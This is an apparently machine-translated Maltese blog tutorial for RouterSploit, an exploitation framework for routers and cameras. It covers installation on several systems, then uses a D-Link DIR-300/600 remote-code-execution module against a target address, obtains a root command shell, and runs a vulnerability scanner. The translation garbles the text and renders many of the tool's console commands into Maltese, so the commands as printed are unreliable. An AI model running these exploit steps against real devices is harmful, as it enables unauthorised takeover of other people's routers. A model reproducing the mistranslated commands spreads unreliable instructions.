Dar » Għodda tal-Linux » RouterSploit – Qafas ta' Sfruttament Tlesti Tutorial [2020]

RouterSploit – Qafas ta' Sfruttament Tlesti Tutorial [2020]

minn Is-Suyash
routersploit

RouterSploit huwa qafas ta 'sfruttament aqwa magħmul speċifikament għal apparati inkorporati.

Din l-għodda tista 'tintuża minn pentester biex tiskennja s-sigurtà tal-kameras u r-routers.

Punti ewlenin ta' RouterSploit:

  • Kodifikat f'Python.
  • Interface tal-linja tal-kmand.
  • Appoġġ Docker.
  • Għodod Modulari.

OS appoġġjat:

  1. MacOS.
  2. Linux.
  3. Telefon Android.
  4. Windows.

Installazzjoni ta' RouterSploit:

Rekwiżiti:

  • futur
  • talbiet
  • Paramika
  • waqqaf
  • pycrypto

Fakultattiv:

  • bluepy – enerġija baxxa Bluetooth

Installazzjoni f'Kali Linux:

Segwi l-kmandi hawn taħt:

apt-get install python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install -r requirements.txt
python3 rsf.py

Appoġġ Bluetooth Low Energy:

apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py

Installazzjoni f'Ubuntu:

Segwi l-kmandi hawn taħt:

sudo add-apt-repository universe
sudo apt-get install git python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install setuptools
python3 -m pip install -r requirements.txt
python3 rsf.py

Appoġġ Bluetooth Low Energy:

apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py

Installazzjoni fuq MacOS:

Segwi l-kmandi hawn taħt:

git clone https://www.github.com/threat9/routersploit
cd routersploit
sudo python3 -m pip install -r requirements.txt
python3 rsf.py

Installazzjoni fuq Docker:

Segwi l-kmandi hawn taħt:

git clone https://www.github.com/threat9/routersploit
cd routersploit
docker build -t routersploit .
docker run -it --rm routersploit

Kif Taġġorna RouterSploit?

Ikollok bżonn taġġorna RouterSploit spiss biex tevita l-inkonvenjent.

Moduli ġodda jintbagħtu kważi kuljum.

cd routersploit
git pull

Kif tuża RouterSploit?

Użu

għerq@kalidev:~/git/routersploit# ./rsf.py
 ______ _ _____ _ _ _
 | ___ \          | |          /  ___|     | |     (_) |
 | |_/ /___ _ _| |_ ___ _ __ `--. _ __ | | ___ _| |_
 |    // _ \| | | | __/ _ \ '__|`--. \ '_ \| |/ _ \| | __|
 | |\ \ (_) | |_| | ||  __/ |  /\__/ / |_) | | (_) | | |_
 _| \____/ __,_|\_____|_|  \____/| .__/|_|\___/|_|\__|
                                     | |
       Qafas ta' Sfruttament għal    |_|   minn Theddida9
            Apparati Inkorporati
  
 Isem tal-kodiċi   : Kont naf li int Inkwiet
 Verżjoni    : 3.3.0
 Homepage   : https://www.threat9.com/ - @threatnine
 Ingħaqad ma' Slack : routersploit.slack.com

 Ingħaqad mal-Programm Beta Threat9 - https://www.threat9.com/

 Sfrutta: 128 Skaners: 4 Krediti: 165 Ġeneriċi: 4 Tagħbijiet: 32 Encoders: 6

rsf >

Sfrutta:

Biex jippreforma l-Isfruttament, agħżel biss il-modulu u ssettja l-mira:

rsf > uża jisfrutta/
tisfrutta/2wire/ tisfrutta/asmax/ tisfrutta/asus/ tisfrutta/cisco/ tisfrutta/dlink/ tisfrutta/fortinet/ tisfrutta/juniper/ tisfrutta/linksys/ tisfrutta/multi/ tisfrutta/netgear/
rsf > uża exploits/dlink/dir_300_600_rce
rsf (D-LINK DIR-300 & DIR-600 RCE) >

Għat-tlestija uża tab-key.

Biex turi għażliet, tipshow:

rsf (D-LINK DIR-300 & DIR-600 RCE) > turi għażliet

Għażliet fil-mira:


   Isem Issettjar kurrenti Deskrizzjoni                                
   ----       ----------------     -----------                                
   mira Indirizz fil-mira eż. http://192.168.1.1     
   port       80                   Port fil-mira

Użurun jewexploit kmand biex tisfrutta l-mira:

rsf (D-LINK DIR-300 & DIR-600 RCE) > run
[+] Il-mira hija vulnerabbli
[*] Invokazzjoni tal-linja tal-kmand...
ċmd > whoami
għerq

Biex tissettja l-għażliet:

rsf (D-LINK DIR-300 & DIR-600 RCE) > issettja mira http://192.168.1.1 [+] {'target': 'http://192.168.1.1'}

Huwa possibbli li tivverifika jekk il-mira hijiex vulnerabbli għal sfruttament partikolari:

rsf (D-LINK DIR-300 & DIR-600 RCE) > iċċekkja
[+] Il-mira hija vulnerabbli

Mexxishow info biex turi informazzjoni dwar l-isfruttament.

Skennjar għal Miri Vulnerabbli:

Skaners jippermettu malajr biex jivverifikaw jekk il-mira hija vulnerabbli għal xi jisfrutta.

Uża l-istess kmandi biex turi/settja l-għażliet, u wkoll biex imexxu.

rsf (D-Link Skaner) > run
[+] exploits/dlink/dwr_932_info_disclosure hija vulnerabbli
[-] exploits/dlink/dir_300_320_615_auth_bypass mhux vulnerabbli
[-] exploits/dlink/dsl_2750b_info_disclosure mhix vulnerabbli
[-] exploits/dlink/dns_320l_327l_rce mhix vulnerabbli
[-] exploits/dlink/dir_645_password_disclosure mhix vulnerabbli
[-] exploits/dlink/dir_300_600_615_info_disclosure mhix vulnerabbli
[-] exploits/dlink/dir_300_600_rce mhix vulnerabbli

[+] L-apparat huwa vulnerabbli!
- jisfrutta/dlink/dwr_932_info_disclosure

RouterSploit uffiċjali

Aqra wkoll: 1337x prokura

Kliem Finali:

RouterSploit hija għodda aqwa biex tużah.

Jekk tiffaċċja xi kwistjonijiet dwar il- RouterSploit. Kun żgur li tikkummenta hawn taħt. It-tim tagħna CSHAWK se jkun f'kuntatt miegħek malajr kemm jista' jkun.

Ħalli Kumment